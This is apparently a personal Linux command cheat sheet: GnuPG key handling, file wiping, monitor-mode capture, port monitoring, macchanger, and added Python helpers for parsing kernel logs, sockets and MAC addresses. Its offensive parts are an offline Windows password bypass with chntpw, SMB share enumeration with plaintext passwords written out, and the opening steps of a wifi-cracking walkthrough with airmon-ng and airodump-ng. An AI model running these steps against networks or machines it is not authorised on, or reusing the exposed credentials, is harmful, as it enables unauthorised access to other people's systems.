Running the gpg --edit-key user-id command will present a menu which enables you to do most of your key management related tasks. Type help in the edit key sub menu to show the complete list of commands. Some useful ones:
> passwd    # change the passphrase
> clean     # compact any user ID that is no longer usable (e.g. revoked or expired)
> revkey    # revoke a key
> addkey    # add a subkey to this key
> expire    # change the key expiration time
> adduid    # add additional names, comments, and email addresses
> addphoto  # add photo to key (must be JPG, 240x288 recommended, enter full path to image when prompted)
Tip: If you have multiple email accounts you can add each one of them as an identity, using the adduid command. You can then set your favourite one as primary.
https://wiki.archlinux.org/index.php/GnuPG#Edit_your_key
Install
$ sudo apt install gnupg
Create Private and Public Keys
Distribute your key. There are different keyservers, but pgp.mit.edu is the most popular one. Use the --keyserver option to specify the key server and --send-keys with the ID of the key you want to publish.
$ gpg --keyserver pgp.mit.edu --send-keys 003D114F
Export Public Key In ASCII Format
gpg --armor --output pubkey.txt --export 'ibaydan'
Encrypt A File with GPG
$ gpg --encrypt --recipient 'ibaydan' --output ServerPass.txt.enc ServerPass.txt
Decrypt A File with GPG
$ gpg --output foo.txt --decrypt ServerPass.txt.enc
List Installed GPG Keys
$ gpg --list-keys
Delete GPG Key
$ gpg --delete-key ibaydan
Delete Key with Secret Keys
$ gpg --delete-secret-keys 'ibaydan@poftut.com'
$ gpg --full-generate-key
Real name: William Ben Bellamy Jr
Email address: wbbellamy@gmail.com
Comment:
You selected this USER-ID:
    "William Ben Bellamy Jr <wbbellamy@gmail.com>"
gpg: key A25347C3440E21D5 marked as ultimately trusted
gpg: revocation certificate stored as '/home/ben/.gnupg/openpgp-revocs.d/B0C56E8DF8C30BB9867F5887A25347C3440E21D5.rev'
public and secret key created and signed.
pub   rsa4096 2020-08-21 [SC]
      B0C56E8DF8C30BB9867F5887A25347C3440E21D5
uid                      William Ben Bellamy Jr <wbbellamy@gmail.com>
sub   rsa4096 2020-08-21 [E]
---[srm sfill sswap smem]--- (top)
Wiping a file:
$ shred -f -u -n 12 -v file_name
$ srm -v file_name
Also see sfill, sswap, and smem.
---[spd-say]--- (top)
Speak Daemon Say
$ spd-say "Hawkings here. Good job!"
---[Changing interface mode]--- (top)
Get info about the wifi interface:
$ sudo iw dev
phy#0
	Unnamed/non-netdev interface
		wdev 0x2
		addr fc:f8:ae:26:86:ef
		type P2P-device
		txpower 0.00 dBm
	Interface wlp2s0
		ifindex 3
		wdev 0x1
		addr fc:f8:ae:26:86:ee
		ssid Private.net
		type managed
		channel 1 (2412 MHz), width: 20 MHz, center1: 2412 MHz
		txpower 22.00 dBm
Change wlp2s0 (wifi interface) to Monitor mode
First stop the Network Manager, otherwise the interface will keep resetting to managed:
$ sudo systemctl stop NetworkManager
You can later restart NetworkManager with the command below. Sometimes you may need to re-login or reboot to straighten this out:
$ sudo systemctl start NetworkManager
$ sudo ifconfig wlp2s0 down
$ sudo iwconfig wlp2s0 mode Monitor
$ sudo ifconfig wlp2s0 up
$ sudo iwconfig
Check the available channels, and which you are currently using:
$ iwlist channel
$ iwlist frequency
Set the channel:
Either of these works:
$ sudo iw dev wlp2s0 set channel 6
$ sudo iwconfig wlp2s0 channel 6
Run tcpdump to capture wifi traffic:
$ sudo tcpdump -v -i wlp2s0
FYI: Include start datetime stamp in pcap filename (capture_2019-08-28_14:03:07.pcap):
$ tcpdump -nni wlp2s0 -v -w ~/"capture_$(date '+%Y-%m-%d_%H:%M:%S').pcap"
Switch back to Managed mode:
$ sudo iwconfig wlp2s0 mode Managed
Switch NetworkManager back on:
$ sudo systemctl start NetworkManager
---[Tarballs]--- (top)
Create a gzip-compressed tarball of a directory or file
$ tar -czvf name-of-archive.tgz /path/to/directory-or-file
Extract a tarball into the current directory
$ tar -xvf archive.tar
Extract a tar gz file (.tar.gz or .tgz) into the /tmp directory
$ tar -xzvf archive.tar.gz -C /tmp
---[Working with processes]--- (top)
List running processes
$ ps aux
List the full process (cgroup) tree; the output is paged through less, so you can search it
$ sudo systemctl status
Get the PID of a process
$ pidof systemd
To kill a running process
$ kill PID
Resources:
---[ANSI timecode format]--- (top)
---[rfkill]--- (top)
rfkill command
Interfaces can be put into hard or soft blocking.
# rfkill list
0: dell-rbtn: Wireless LAN
    Soft blocked: no
    Hard blocked: no
1: phy0: Wireless LAN
    Soft blocked: yes
    Hard blocked: no
2: hci0: Bluetooth
    Soft blocked: no
    Hard blocked: no
# rfkill unblock wifi
# rfkill
ID TYPE      DEVICE    SOFT      HARD
 0 wlan      dell-rbtn unblocked unblocked
 1 wlan      phy0      unblocked unblocked
 2 bluetooth hci0      unblocked unblocked
# rfkill list
0: dell-rbtn: Wireless LAN
    Soft blocked: no
    Hard blocked: no
1: phy0: Wireless LAN
    Soft blocked: no
    Hard blocked: no
2: hci0: Bluetooth
    Soft blocked: no
    Hard blocked: no
Sometimes, even though wlan0 is no longer blocked, you will still need to bring it up with the ip command. In Kali you may also need to open the pull-down menu and turn wifi on if it is flagged as off.
# ip link set wlan0 up
---[dmesg]--- (top)
From # dmesg --help:
 -f, --facility <list>   restrict output to defined facilities
 -H, --human             human readable output (piped through less)
 -x, --decode            decode facility and level to readable string
 -l, --level <list>      restrict output to defined levels

Supported log facilities:
    kern   - kernel messages
    user   - random user-level messages
    mail   - mail system
    daemon - system daemons
    auth   - security/authorization messages
    syslog - messages generated internally by syslogd
    lpr    - line printer subsystem
    news   - network news subsystem

Supported log levels (priorities):
    emerg  - system is unusable
    alert  - action must be taken immediately
    crit   - critical conditions
    err    - error conditions
    warn   - warning conditions
    notice - normal but significant condition
    info   - informational
    debug  - debug-level messages
This will list only kernel level messages
# dmesg -f kern
This will list only warning level messages
# dmesg -l warn
This will list the messages in human readable format and pipe them through less.
# dmesg -H
This will prefix each message with its decoded facility and level (e.g. kern:warn).
# dmesg -x
And of course you can pipe the output of dmesg to grep specific string(s).
# dmesg | grep -i wlan0
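The -f and -l filters above work because every kernel log record carries a syslog priority value, pri = facility * 8 + level, which is what -x decodes. The script below is an added example (not part of these notes) that parses records in the /dev/kmsg line format and applies the same facility and level filters; the log lines in it are constructed, and the facility/level tables follow the dmesg --help order shown above.

```python
"""Filter kernel log records by syslog facility and level, which is what
`dmesg -f kern`, `dmesg -l warn` and `dmesg -x` do on top of the raw log.

Added example, not part of the original notes.  The records below are
constructed in the /dev/kmsg line format ("<pri>,<seq>,<usec>,<flags>;<msg>",
continuation lines start with a space), where pri = facility * 8 + level.
No real log is read.
"""
from dataclasses import dataclass

# Same order as the facility and level tables printed by `dmesg --help`.
FACILITIES = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr", "news"]
LEVELS = ["emerg", "alert", "crit", "err", "warn", "notice", "info", "debug"]


def decode_pri(pri: int):
    """Split a syslog PRI value into (facility, level) names.

    Facilities above 7 (authpriv=10, local0..7=16..23) are not in dmesg's
    short table and are returned as their number."""
    facility, level = divmod(pri, 8)
    name = FACILITIES[facility] if facility < len(FACILITIES) else str(facility)
    return name, LEVELS[level]


@dataclass
class KmsgRecord:
    facility: str
    level: str
    seq: int
    usec: int      # microseconds since boot
    message: str


def parse_kmsg(text: str):
    """Parse /dev/kmsg style lines into records, dropping continuation lines."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(" "):
            continue
        header, _, message = line.partition(";")
        pri, seq, usec = header.split(",")[:3]
        facility, level = decode_pri(int(pri))
        records.append(KmsgRecord(facility, level, int(seq), int(usec), message))
    return records


def select(records, facilities=None, levels=None):
    """Equivalent of -f <list> / -l <list>: keep records whose facility and
    level are in the given lists; None means no restriction on that axis."""
    return [r for r in records
            if (facilities is None or r.facility in facilities)
            and (levels is None or r.level in levels)]


def render(record: KmsgRecord) -> str:
    """-x style line: decoded facility:level, then the boot-relative timestamp."""
    return f"{record.facility:<6}:{record.level:<6}: [{record.usec / 1e6:12.6f}] {record.message}"


# Constructed sample; the messages imitate mac80211/iwlwifi/NetworkManager
# lines but were written for this example.
SAMPLE_KMSG = """\
6,1001,12345678,-;wlan0: authenticated
6,1002,12350000,-;wlan0: associated
4,1003,12400000,-;wlan0: deauthenticated from b4:75:0e:25:49:be (Reason: 7=CLASS3_FRAME_FROM_NONASSOC_STA)
13,1004,12450000,-;NetworkManager[820]: device (wlan0): state change: activated -> disconnected
 SUBSYSTEM=net
3,1005,12500000,-;iwlwifi 0000:02:00.0: firmware error (constructed message)
86,1006,12550000,-;sudo: session opened for user root
"""

if __name__ == "__main__":
    recs = parse_kmsg(SAMPLE_KMSG)
    for r in select(recs, facilities=["kern"], levels=["err", "warn"]):
        print(render(r))
```

Running it prints only the kern-facility warn and err records, which is the same selection as `dmesg -f kern -l warn,err -x`. Note that -l is an exact list, not a "this level and above" threshold; to catch a wlan deauthentication (logged at warn) you have to name warn explicitly.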
---[Monitoring open ports]--- (top)
$ whatis netstat
netstat (8)          - Print network connections, routing tables, interface statisti...
$ watch netstat -tanp
$ sudo netstat -atnp | grep ESTABLISHED | awk '{printf "%-25s %-10s %-25s %-20s\n",$7,$1,$4,$5}' | sed /^-/d | sed 's/\// /g'
This includes the listening sockets as well as the established connections
$ sudo netstat -atnp | grep "ESTABLISHED\|LISTEN" | awk '{printf "%-25s %-10s %-25s %-20s\n",$7,$1,$4,$5}' | sed /^-/d | sed 's/\// /g'
Check which executable a specific PID is running
$ ls -l /proc/1138/exe
netstat is considered deprecated; ss has replaced it.
$ sudo ss -tulpn
Find out the PID of the process that opened TCP port 7000:
# fuser 7000/tcp
Find out the process name associated with PID 3813:
# ls -l /proc/3813/exe
To find out the current working directory of a process called bittorrent or PID 3813:
# ls -l /proc/3813/cwd
or use the pwdx command:
# pwdx 3813
Use the following commands to find out the owner of process PID 3813:
# ps aux | grep 3813
# ps aux | grep '[3]813'
https://www.cyberciti.biz/faq/what-process-has-open-linux-port/
You can also use ss for a nice clean list of bound ports.
$ sudo ss -tulpn

netstat cheat sheet:
netstat -a | more        : show both listening and non-listening sockets
netstat -pt              : display the PID and program names
netstat -at              : list all tcp ports
netstat -l               : list only the listening ports
netstat -s               : list the statistics for all ports
netstat -c               : print the netstat information continuously
netstat --verbose        : also report the address families not supported on the system
netstat -r               : get the kernel routing information
netstat -ap | grep ssh   : get the port on which a program is running
netstat -an | grep ':80' : get the process which is using the given port
netstat -i               : get the list of network interfaces
netstat -ie              : display extended information on the interfaces
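All of the tools above (netstat, ss, fuser, the /proc/PID/exe trick) read the same two sources: the socket table in /proc/net/tcp, and the socket:[inode] symlinks under /proc/PID/fd that tie an inode back to a process. The script below is an added example (not part of these notes) that decodes the table the way ss does; the /proc/net/tcp sample and the inode-to-process map are constructed (they imitate the cupsd on 631 and apache2 on 80 from the fuser output below), and the live map is only consulted when the script is run on a real box.

```python
"""Decode /proc/net/tcp the way netstat and ss do, and join socket inodes to
processes the way `ss -p` / `fuser` do via /proc/<pid>/fd.

Added example, not part of the original notes.  SAMPLE_PROC_NET_TCP and
INODE_TO_PROC are constructed (they imitate the cupsd on 631 and apache2 on
80 seen in the fuser output on this page, and the 192.168.2.8 address of
wlp2s0); the live inode map from inode_to_proc_from_proc() is only used
when you run it on a real box.
"""
from __future__ import annotations
import os
import socket
import struct

# Values of the `st` column (include/net/tcp_states.h numbering).
TCP_STATES = {
    "01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
    "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
    "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING",
}


def decode_endpoint(hexaddr: str) -> tuple[str, int]:
    """'0100007F:0277' -> ('127.0.0.1', 631).

    The kernel prints the IPv4 address as one 32-bit word in host byte order
    (little-endian on x86, so the octets read back to front) and the port as
    big-endian 16-bit hex."""
    ip_hex, port_hex = hexaddr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def inode_to_proc_from_proc() -> dict[str, str]:
    """Build {socket_inode: 'pid/comm'} from /proc/<pid>/fd/* symlinks.
    Other users' processes are only readable as root, which is why the notes
    use sudo with ss -p and fuser."""
    mapping = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            for fd in os.listdir(f"/proc/{pid}/fd"):
                target = os.readlink(f"/proc/{pid}/fd/{fd}")
                if target.startswith("socket:["):
                    mapping[target[len("socket:["):-1]] = f"{pid}/{comm}"
        except OSError:
            continue          # process exited, or not ours to read
    return mapping


def parse_proc_net_tcp(text: str, inode_to_proc: dict[str, str] | None = None):
    rows = []
    for line in text.splitlines()[1:]:          # first line is the header
        f = line.split()
        if len(f) < 10:
            continue
        lip, lport = decode_endpoint(f[1])
        rip, rport = decode_endpoint(f[2])
        rows.append({
            "state": TCP_STATES.get(f[3], f[3]),
            "local": f"{lip}:{lport}",
            "remote": f"{rip}:{rport}",
            "uid": int(f[7]),
            "inode": f[9],
            "process": (inode_to_proc or {}).get(f[9], "-"),
        })
    return rows


def listening(rows):
    """What `ss -tln` shows: sockets in LISTEN state."""
    return [r for r in rows if r["state"] == "LISTEN"]


# Constructed sample in the exact /proc/net/tcp column layout.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 23456 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 24001 1 0000000000000000 100 0 0 10 0
   2: 0802A8C0:A1B2 076433C6:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 31337 1 0000000000000000 20 4 30 10 -1
"""
INODE_TO_PROC = {"23456": "859/cupsd", "24001": "948/apache2"}   # constructed

if __name__ == "__main__":
    live = inode_to_proc_from_proc() if os.path.exists("/proc/net/tcp") else {}
    for row in parse_proc_net_tcp(SAMPLE_PROC_NET_TCP, {**INODE_TO_PROC, **live}):
        print(row)
```

A socket whose inode maps to no process at all (the "-" that ss -p also prints) is either owned by a process you cannot read without root, or orphaned in TIME_WAIT; an unexplained LISTEN socket with no owner is worth chasing with sudo.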
---[CCCC Examples]--- (top)
First, identify the available shares
$ enum4linux -S -u "CCCCStaff" -p "CapCity2014" 10.32.10.3

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    D$              Disk      Default share
    E$              Disk      Default share
    IPC$            IPC       Remote IPC
    S$              Disk      Default share
    Staff Drive     Disk

$ enum4linux -S -u "CCCCStaff" -p "CapCity2014" 10.32.10.4

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    E$              Disk      Default share
    F$              Disk      Default share
    G$              Disk      Default share
    H$              Disk      Default share
    IPC$            IPC       Remote IPC
    K$              Disk      Default share
    Kiosk           Disk
    Media G         Disk      Bios lists as 00:04 - in slot 5 - installed 02/23/2014
    Media H         Disk      Bios lists as 00:05 - in slot 6 - 2TB drive installed on 02/23/2014
    Users           Disk
Next, mount a share
$ sudo mount -t cifs '\\10.32.10.3\Staff Drive' /media/ben/staff -o username=CCCCStaff,password="CapCity2014"
$ sudo mount -t cifs //10.32.10.3/ /media/ben/staff -o username=Customware,password="ADMcc1188"
You can also use the following to open a terminal like session with a share.
# smbclient //10.32.10.3/C$ -U CCCCStaff
---[chntpw]--- (top)
Changing the password of any account in Windows 7/8/9/10 - offline.
Making a live chntpw USB (from https://appuals.com/create-a-password-reset-disk-using-chntpw/):
Copy all the extracted contents to your USB drive's root, then run
    h:\syslinux.exe -ma h:
Note: the "h" in the above command will be replaced by the actual drive letter of your USB drive. This is it! You now have a live chntpw USB that is ready to be booted with!

Windows 10: https://www.top-password.com/knowledge/reset-windows-10-password-with-ubuntu.html

Using a Fedora live USB (from https://fedoramagazine.org/modifying-windows-local-accounts-with-fedora-and-chntpw/):
Once the key is created, shut down the Windows PC, insert the thumb drive (if the USB key was created on another computer), and turn on the PC, making sure to boot from the USB drive. Once the live media boots, select "Try Fedora" and open the Terminal application. We also need to mount the Windows drive to access the files. Enter the following command to view all drive partitions with an NTFS filesystem:
Once the drive is mounted, navigate to the location of the SAM file and verify that it's there:
$ cd /mnt/Windows/System32/config
$ ls | grep SAM
SAM
SAM.LOG1
SAM.LOG2
Use the -l parameter to display a list of users it reads from the SAM file:
$ sudo chntpw -l SAM
Now that we have a list of Windows users we can edit the account. Use the -u parameter followed by the username and the name of the SAM file. For this example, edit the sysadm account:
$ sudo chntpw -u sysadm SAM
Verify the change by repeating:
$ sudo chntpw -l SAM
---[What app is bound to a port]--- (top)
To find out which process is actually listening on that port you can use the following:
$ sudo fuser -v 631/tcp
                     USER        PID ACCESS COMMAND
631/tcp:             root        859 F.... cupsd
$ sudo fuser -v 53/tcp
                     USER        PID ACCESS COMMAND
53/tcp:              systemd-resolve 795 F.... systemd-resolve
$ sudo fuser -v 445/tcp
                     USER        PID ACCESS COMMAND
445/tcp:             root       1303 F.... smbd
$ sudo fuser -v 80/tcp
                     USER        PID ACCESS COMMAND
80/tcp:              root        948 F.... apache2
                     www-data   2626 F.... apache2
                     www-data   2627 F.... apache2
---[macchanger]--- (top)
Display current MAC address
$ ifconfig wlp2s0
wlp2s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.2.8  netmask 255.255.255.0  broadcast 192.168.2.255
        inet6 fe80::2f2d:8b0a:e776:d86a  prefixlen 64  scopeid 0x20
        ether fc:f8:ae:26:86:ee  txqueuelen 1000  (Ethernet)
        RX packets 2132514  bytes 2986638501 (2.9 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 894539  bytes 114997888 (114.9 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

$ macchanger -s wlp2s0
Current MAC:   fc:f8:ae:26:86:ee (Intel Corporate)
Permanent MAC: fc:f8:ae:26:86:ee (Intel Corporate)
Take the interface down
$ sudo ifconfig wlp2s0 down
Change the MAC address to a random address
$ sudo macchanger -A wlp2s0
Current MAC:   fc:f8:ae:26:86:ee (Intel Corporate)
Permanent MAC: fc:f8:ae:26:86:ee (Intel Corporate)
New MAC:       dc:fa:d5:6e:f6:04 (STRONG Ges.m.b.H.)

Running it again picks a new random vendor address:
$ sudo macchanger -A wlp2s0
Current MAC:   dc:fa:d5:6e:f6:04 (STRONG Ges.m.b.H.)
Permanent MAC: fc:f8:ae:26:86:ee (Intel Corporate)
New MAC:       00:02:25:5d:cc:5c (One Stop Systems)
Bring the interface back up
$ sudo ifconfig wlp2s0 up
Display the new MAC address
$ ifconfig wlp2s0
wlp2s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.2.8  netmask 255.255.255.0  broadcast 192.168.2.255
        ether 00:02:25:5d:cc:5c  txqueuelen 1000  (Ethernet)
        RX packets 2137209  bytes 2993237477 (2.9 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 896368  bytes 115192210 (115.1 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
Take the interface back down
$ sudo ifconfig wlp2s0 down
Reset the interface to the original MAC address
$ sudo macchanger -p wlp2s0
Current MAC:   00:02:25:5d:cc:5c (One Stop Systems)
Permanent MAC: fc:f8:ae:26:86:ee (Intel Corporate)
New MAC:       fc:f8:ae:26:86:ee (Intel Corporate)
Display the current MAC address
$ ifconfig wlp2s0
wlp2s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.2.8  netmask 255.255.255.0  broadcast 192.168.2.255
        ether fc:f8:ae:26:86:ee  txqueuelen 1000  (Ethernet)
        RX packets 2137286  bytes 2993241355 (2.9 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 896384  bytes 115195018 (115.1 MB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
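The vendor names macchanger prints in parentheses come from the OUI, the first three octets; two more bits in the first octet decide whether an address is unicast or group (I/G, bit 0) and whether it is globally assigned or locally administered (U/L, bit 1). macchanger -A, as used above, picks addresses with the U/L bit clear so they look like real vendor hardware, whereas OS privacy randomisation and macchanger -r set it. The script below is an added example (not part of these notes) that decodes those bits and checks an observed address list against a device inventory; the inventory and the observed list are constructed from addresses that appear in this page's output (fc:f8:ae:26:86:ee, 00:02:25:5d:cc:5c, and D8/DA:31:34:68:77:AF from the airodump-ng tables further down).

```python
"""Read the I/G and U/L bits of a MAC address and audit observed addresses
against a device inventory.

Added example, not part of the original notes.  INVENTORY and OBSERVED are
constructed; the addresses themselves are taken from output on this page
(fc:f8:ae:26:86:ee is the permanent Intel MAC, 00:02:25:5d:cc:5c the one
macchanger -A assigned, D8/DA:31:34:68:77:AF appear in the airodump-ng tables).
"""
import re

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}$")


def parse_mac(text: str) -> bytes:
    """Accept aa:bb:cc:dd:ee:ff or aa-bb-cc-dd-ee-ff in either case."""
    if not MAC_RE.match(text):
        raise ValueError(f"not a MAC address: {text!r}")
    return bytes(int(octet, 16) for octet in re.split(r"[:-]", text))


def classify(text: str) -> dict:
    raw = parse_mac(text)
    first = raw[0]
    return {
        "mac": raw.hex(":"),
        "oui": raw[:3].hex(":"),                      # vendor prefix macchanger resolves
        "multicast": bool(first & 0x01),            # I/G bit, bit 0 of the first octet
        "broadcast": raw == b"\xff" * 6,
        "locally_administered": bool(first & 0x02), # U/L bit, bit 1 of the first octet
    }


def audit(observed, inventory):
    """inventory: {mac: hostname} of the devices you expect to see.
    Returns [(mac, reason)] for addresses worth a second look."""
    known = {mac.lower() for mac in inventory}
    findings = []
    for text in observed:
        info = classify(text)
        if info["multicast"]:
            continue                                  # group address, never a station
        if info["locally_administered"]:
            findings.append((info["mac"], "locally administered (randomised or spoofed)"))
        elif info["mac"] not in known:
            findings.append((info["mac"], f"not in inventory, OUI {info['oui']}"))
    return findings


INVENTORY = {                         # constructed
    "fc:f8:ae:26:86:ee": "ben-laptop",
    "d8:31:34:68:77:af": "phone",
}
OBSERVED = [                          # constructed from addresses on this page
    "FC:F8:AE:26:86:EE", "D8:31:34:68:77:AF", "DA:31:34:68:77:AF",
    "00:02:25:5D:CC:5C", "01:00:5E:00:00:FB", "FF:FF:FF:FF:FF:FF",
]

if __name__ == "__main__":
    for mac, reason in audit(OBSERVED, INVENTORY):
        print(f"{mac}  {reason}")
```

The audit flags DA:31:34:68:77:AF (U/L bit set) and 00:02:25:5d:cc:5c (not in the inventory) and ignores the multicast and broadcast entries. Note that D8:31:34:68:77:AF and DA:31:34:68:77:AF, which both show up in the airodump-ng output on this page, differ only in the U/L bit; an inventory check that ignores that bit would wrongly treat them as the same device, and one that relies on the OUI alone would miss a macchanger -A address entirely, since its OUI is a real vendor's.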
---[Cracking wifi credentials]--- (top)
This section deals with collecting the handshake from a Wifi network and preparing it for cracking.
Display the current wifi interfaces (wlp2s0 or wlan0 are the built-in wifi, and wlx00c0ca8f2b07 is my external wifi interface). Note that they are in 'managed' mode and not associated with an AP.
$ iwconfig
wlp2s0    IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

wlx00c0ca8f2b07  IEEE 802.11  ESSID:"ATTFJ4Br3A"
          Mode:Managed  Frequency:5.765 GHz  Access Point: C6:52:61:97:05:B3
          Bit Rate=135 Mb/s   Tx-Power=30 dBm
          Retry short long limit:2   RTS thr:off   Fragment thr:off
          Power Management:on
          Link Quality=70/70  Signal level=-39 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:93   Missed beacon:0

lo        no wireless extensions.

eno1      no wireless extensions.

And to see other details...
$ sudo ifconfig
[sudo] password for ben:
eno1: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 5c:26:0a:69:40:2a  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
        device interrupt 20  memory 0xe2e00000-e2e20000

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 257  bytes 22927 (22.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 257  bytes 22927 (22.9 KB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

wlp2s0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether c0:f8:da:79:de:fc  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
        device interrupt 17

wlx00c0ca8f2b07: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.73  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::22e9:3a1:c500:28af  prefixlen 64  scopeid 0x20<link>
        ether 00:c0:ca:8f:2b:07  txqueuelen 1000  (Ethernet)
        RX packets 7613  bytes 10092273 (10.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4172  bytes 424253 (424.2 KB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
Check if there are any potential problem processes
$ sudo airmon-ng check

Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  820 NetworkManager
  821 wpa_supplicant
  823 avahi-daemon
  874 avahi-daemon
11712 dhclient
Kill the problem processes. Make sure to give it some time for them to actually terminate. You might want to run the kill a couple times...
$ sudo airmon-ng check kill

Killing these processes:

  PID Name
  821 wpa_supplicant

(wait a moment and then...)

$ sudo airmon-ng check
$
Verify the interface is now reset
$ sudo iwconfig
wlp2s0    IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=200 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

wlx00c0ca8f2b07  IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=30 dBm
          Retry short long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on

lo        no wireless extensions.

eno1      no wireless extensions.
Start the new wifi interface (wlp2s0mon)
$ sudo airmon-ng start wlx00c0ca8f2b07

PHY     Interface        Driver      Chipset

phy0    wlp2s0           wl          Broadcom Inc. and subsidiaries BCM43228 802.11a/b/g/n
phy1    wlx00c0ca8f2b07  rt2800usb   Ralink Technology, Corp. RT3572
Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.

                (mac80211 monitor mode vif enabled on [phy1]wlan0mon
                (mac80211 station mode vif disabled for [phy1]wlx00c0ca8f2b07)
Check to verify the interface is set to monitor mode as seen below.
$ sudo iwconfig
wlp2s0    IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=200 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

lo        no wireless extensions.

eno1      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Tx-Power=30 dBm
          Retry short long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
Launch the capture of available APs and clients. This runs in channel-hopping mode. Let it run until you see the AP ESSID you are interested in, and an active client station associated with that BSSID.
$ sudo airodump-ng wlan0mon

 CH  6 ][ Elapsed: 4 mins ][ 2019-09-28 15:50

 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 2C:99:24:96:2A:11   -1        0      1    0   1  -1   OPN              <length:  0>
 B4:75:0E:25:49:BE  -31      179   3215    0   1  54e  WPA2 CCMP   PSK  Private.net
 DA:31:34:68:77:AF  -34      156      1    0   1  54e  WPA2 CCMP   PSK  <length:  0>
 B0:EE:7B:AF:1E:E5  -50      156      0    0   1  54e  WPA2 CCMP   PSK  <length: 22>
 94:8F:CF:75:BE:00  -60      152     69    0   1  54e  WPA2 CCMP   PSK  ATTB2f6CTA
 A2:17:B8:45:0D:63  -75      130     49    0   1  54e  WPA2 CCMP   PSK  <length:  9>
 30:E1:71:B2:B8:66  -76      124      0    0  11  54e  WPA2 CCMP   PSK  DIRECT-65-HP ENVY 451
 F4:17:B8:45:0D:62  -76      132     63    0   1  54e  WPA2 CCMP   PSK  ATTB2f6CTA
 A0:04:60:35:2D:C5  -76      121      0    0   6  54e  WPA2 CCMP   PSK  Serenity
 F8:2D:C0:D4:82:50  -77      135     79    0   1  54e  WPA2 CCMP   PSK  ATTPSHiJ4I
 1C:49:7B:40:18:A9  -78      141     27    0  11  54e  WPA2 CCMP   PSK  Nobility
 1E:49:7B:40:18:AA  -78      134     16    0  11  54e  WPA2 CCMP   PSK  Peasants
 00:D0:2D:B7:51:11  -78      136      0    0   6  54e  OPN              NewThermostat_B75111
 94:8F:CF:1C:94:50  -81       81     37    0   6  54e  WPA2 CCMP   PSK  ATTAG2GTA2
 14:91:82:D4:3E:80  -80        0      2    0   5  -1   WPA              <length:  0>
 2C:30:33:E7:45:7D  -81       19     18    0   5  54e  WPA2 CCMP   PSK  belkin.e80_2GEXT
 F0:99:BF:09:27:7A  -81       26      1    0   6  54e  WPA2 CCMP   PSK  miller home
 14:91:82:D4:3E:83  -81        8      0    0   5  54e  OPN              belkin.e80.guests
